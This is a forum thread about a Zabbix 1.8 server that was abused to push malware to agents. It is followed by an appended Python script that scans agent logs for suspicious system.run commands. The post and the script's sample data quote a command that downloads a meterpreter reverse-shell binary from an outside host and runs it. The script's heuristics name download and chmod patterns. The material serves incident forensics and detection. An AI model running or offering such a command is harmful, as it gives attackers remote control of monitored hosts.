My Zabbix was compromised

  • mattsims
    Junior Member
    • Jul 2013
    • 8

    #1

    My Zabbix was compromised

    I am in the midst of moving over to Zabbix 2.0. We were still using Zabbix 1.8.

    While testing Zabbix 2.0 agents I noticed the following in one of the client agent logs:

    15687:20130823:212702.907 Requested [system.run["curl http://www.evilrovot.com/meterpreter_reverse_tcp > /tmp/meterpreter_reverse_tcp ; chmod u+x /tmp/meterpreter_reverse_tcp; ./tmp/meterpreter_reverse_tcp &","nowait"]]
    15687:20130823:212702.907 Executing command 'curl http://www.evilrovot.com/meterpreter_reverse_tcp > /tmp/meterpreter_reverse_tcp ; chmod u+x /tmp/meterpreter_reverse_tcp; ./tmp/meterpreter_reverse_tcp &'

    Sure enough, there was a meterpreter_reverse_tcp process running.

    No matter how many times I killed the proc and removed the /tmp/meterpreter_reverse_tcp it would eventually re-appear.

    Scanning all my hosts, I saw this was prevalent on several hosts.

    I had thought it was my new Zabbix 2.0 server. But it turns out it was the Zabbix 1.8 server. I figured it out by shutting down the older 1.8 zabbix_server daemon. Since doing that, none of the clients have received the file again.

    I want to do some forensics but don't want to turn on the server daemon. Is there a way I could maybe find this in the database?
  • richlv
    Senior Member
    Zabbix Certified Trainer
    Zabbix Certified Specialist
    Zabbix Certified Professional
    • Oct 2005
    • 3112

    #2
    check your zabbix server (using the frontend), find those items. then you can check the auditlog and see from which host and when they were added.

    if it's just the local server itself, it won't tell you much, just that the operating system was compromised first...
    Zabbix 3.0 Network Monitoring book
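For the agent-side half of the forensics mattsims asks about in post #1, here is an added example (not from this thread and not Zabbix's own code) that scans zabbix_agentd log lines for `system.run` requests, splits the item-key parameters, and tags commands matching simple payload-drop heuristics. The heuristics and the sample log are my own constructions; the first sample line is the "Requested" line quoted in the post.

```python
import re
from collections import namedtuple
from datetime import datetime

# Zabbix agent log format as quoted in the post: "<pid>:<yyyymmdd>:<hhmmss.mmm> Requested [<item key>]".
REQUESTED_RE = re.compile(r"^(?P<pid>\d+):(?P<date>\d{8}):(?P<time>\d{6}\.\d{3}) Requested \[system\.run\[(?P<args>.*)\]\]$")

# My own heuristics (not Zabbix's) for commands that look like a payload drop rather than a monitoring check.
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "downloads a file"),
    (r"\bchmod\s+\S*x\b", "marks a file executable"),
    (r"/tmp/", "writes to or runs from /tmp"),
    (r"&\s*$", "backgrounds the command"),
    (r"meterpreter|reverse_tcp", "known payload name"),
]
# mode is the second system.run parameter: "wait" (the Zabbix default) or "nowait".
SystemRunEvent = namedtuple("SystemRunEvent", "pid when command mode reasons")

def split_key_params(args: str) -> list:
    """Split item-key parameters; a quoted parameter may contain commas and \\" escapes."""
    params, i, n = [], 0, len(args)
    while i < n:
        if args[i] == '"':                          # quoted: runs to the next unescaped quote
            m = re.match(r'"((?:[^"\\]|\\.)*)"?', args[i:])
            params.append(m.group(1).replace('\\"', '"'))
            i += m.end() + 1                        # also skip the comma after the closing quote
        else:                                       # unquoted: runs to the next comma
            j = args.find(",", i); j = n if j == -1 else j
            params.append(args[i:j]); i = j + 1
    return params

def scan_agent_log(lines) -> list:
    """Return every system.run request in the agent log, tagged with why it looks suspicious."""
    events = []
    for line in lines:
        m = REQUESTED_RE.match(line.strip())
        if not m:                                   # "Executing command ..." and other item keys are skipped
            continue
        params = split_key_params(m.group("args"))
        command, mode = (params[0] if params else ""), (params[1] if len(params) > 1 else "wait")
        when = datetime.strptime(m.group("date") + m.group("time"), "%Y%m%d%H%M%S.%f")
        reasons = [why for pat, why in SUSPICIOUS if re.search(pat, command)]
        events.append(SystemRunEvent(int(m.group("pid")), when, command, mode, reasons))
    return events

# Constructed sample: the "Requested" line quoted in the post, a routine item, and a benign system.run.
SAMPLE_LOG = """\
15687:20130823:212702.907 Requested [system.run["curl http://www.evilrovot.com/meterpreter_reverse_tcp > /tmp/meterpreter_reverse_tcp ; chmod u+x /tmp/meterpreter_reverse_tcp; ./tmp/meterpreter_reverse_tcp &","nowait"]]
15687:20130823:212710.412 Requested [vfs.fs.size[/,free]]
15688:20130823:212800.010 Requested [system.run["uptime"]]
"""
```

Running `scan_agent_log` over every agent's log gives a per-host timeline of which commands arrived and when, which can then be matched against the server-side item and auditlog records richlv points at.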
